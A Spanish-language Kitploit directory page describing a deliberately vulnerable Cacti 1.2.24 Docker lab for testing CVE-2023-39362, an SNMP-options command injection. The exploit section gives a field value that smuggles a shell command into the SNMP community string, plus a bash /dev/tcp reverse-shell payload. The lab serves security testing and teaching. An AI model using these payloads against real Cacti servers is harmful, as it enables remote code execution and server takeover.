Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cacti-rce-snmp-options-vulnerable-application — ADVERTENCIA: Esta es una aplicación vulnerable para probar el exploit de la inyección de comandos de Cacti (CVE-2023-39362). ¡Ejecútela bajo su propio riesgo! | Kitploit
Herramientas/GitHubGitHub/m3ssap0/cacti-rce-snmp-options-vulnerable-application
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebComando y ControlAprendizaje y EducaciónLabs y Práctica
GitHubm3ssap0/cacti-rce-snmp-options-vulnerable-application

cacti-rce-snmp-options-vulnerable-application

ADVERTENCIA: Esta es una aplicación vulnerable para probar el exploit de la inyección de comandos de Cacti (CVE-2023-39362). ¡Ejecútela bajo su propio riesgo!

Ver RepositorioSitio web
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Cacti v1.2.24 inyección de comandos autenticada (CVE-2023-39362) aplicación vulnerable

Esta es una aplicación vulnerable para probar el exploit de la vulnerabilidad Cacti (CVE-2023-39362).

¡ADVERTENCIA!

¡Esta aplicación contiene vulnerabilidades de seguridad graves. Úsela bajo su propio riesgo! Se recomienda utilizar un entorno respaldado y aislado (como una máquina virtual con una instantánea reciente y redes solo anfitrión). No suba esta aplicación a ningún servidor expuesto a Internet, ya que se verán comprometidos.

DESCARGO DE RESPONSABILIDAD: No me hago responsable del uso que cualquier persona haga de esta aplicación. El único propósito de esta aplicación es ser un escenario de prueba para el exploit CVE-2023-39362 y no debe utilizarse con fines maliciosos. Si su servidor se ve comprometido mediante una instalación de esta aplicación, no es mi responsabilidad, sino de la(s) persona(s) que la subieron e instalaron.

Información de la vulnerabilidad

  • CVE-ID: CVE-2023-39362
  • Enlace: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362
  • Descripción: En Cacti 1.2.24, bajo ciertas condiciones, un usuario privilegiado autenticado puede usar una cadena maliciosa en las opciones SNMP de un Dispositivo, realizando una inyección de comandos y obteniendo ejecución remota de código en el servidor subyacente.

Uso

Estos son los pasos para configurar el entorno:

  1. Ejecute docker compose up -d para iniciar la composición.
  2. Puede finalizar los pasos navegando a http://127.0.0.1/cacti para iniciar el asistente de inicialización de Cacti. Si obtiene un error relacionado con la base de datos, espere un poco y actualice la página.
  3. Las credenciales predeterminadas son admin/admin.
  4. Pulse "Siguiente" en todos los botones durante el asistente, eligiendo las opciones correspondientes. Todos los valores predeterminados deberían estar bien y todos los requisitos previos obligatorios deberían cumplirse.
  5. Después de la instalación, inicie sesión como admin.
  6. Vaya a "Consola" > "Configuración" > "Usuario".
  7. Haga clic en el usuario guest.
  8. "Habilitar"lo, establezca una contraseña, desactive "Debe cambiar la contraseña al próximo inicio de sesión" si lo desea.
  9. Haga clic en el botón "Guardar".
  10. Vaya a la sección "Permisos".
  11. En "Administración general", habilite "Acceso a la consola" y "Sitios/Dispositivos/Datos".
  12. Haga clic en el botón "Guardar".
  13. Cierre la sesión y vuelva a iniciarla como guest para probar el exploit.

El contenedor se llamará vuln-cacti.

El nombre de host para un dispositivo SNMP de prueba es monitored_snmp_device.

Para desmontar el entorno, use el comando docker compose down.

La guía de instalación oficial de Cacti se puede encontrar aquí.

Causa raíz

Una causa raíz detallada de la vulnerabilidad está disponible en el aviso de seguridad original o en mi publicación de blog.

Exploit

(Este es solo un posible exploit)

  1. Vaya a "Consola" > "Crear" > "Nuevo dispositivo".
  2. Cree un Dispositivo que soporte SNMP versión 1 o 2.
  3. Asegúrese de que el Dispositivo tenga Gráficos con una o más plantillas de:
    • "Net-SNMP - Combined SCSI Disk Bytes"
    • "Net-SNMP - Combined SCSI Disk I/O"
    • (Crear el Dispositivo desde la plantilla "Net-SNMP Device" satisfará el requisito previo de Gráficos)
  4. En las "Opciones SNMP", para el campo "Cadena de comunidad SNMP", use un valor como este: public\' ; touch /tmp/m3ssap0 ; \'.
  5. Haga clic en el botón "Crear".
  6. Verifique en /tmp la presencia del archivo creado.

Para obtener una shell inversa, se puede usar un payload como el siguiente.

root@kitploit:~
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

Autores

  • Antonio Francesco Sardella - reportador de vulnerabilidad - m3ssap0

Licencia

Este proyecto está licenciado bajo Unlicense - consulte el archivo LICENSE para obtener más detalles.

Descargar herramienta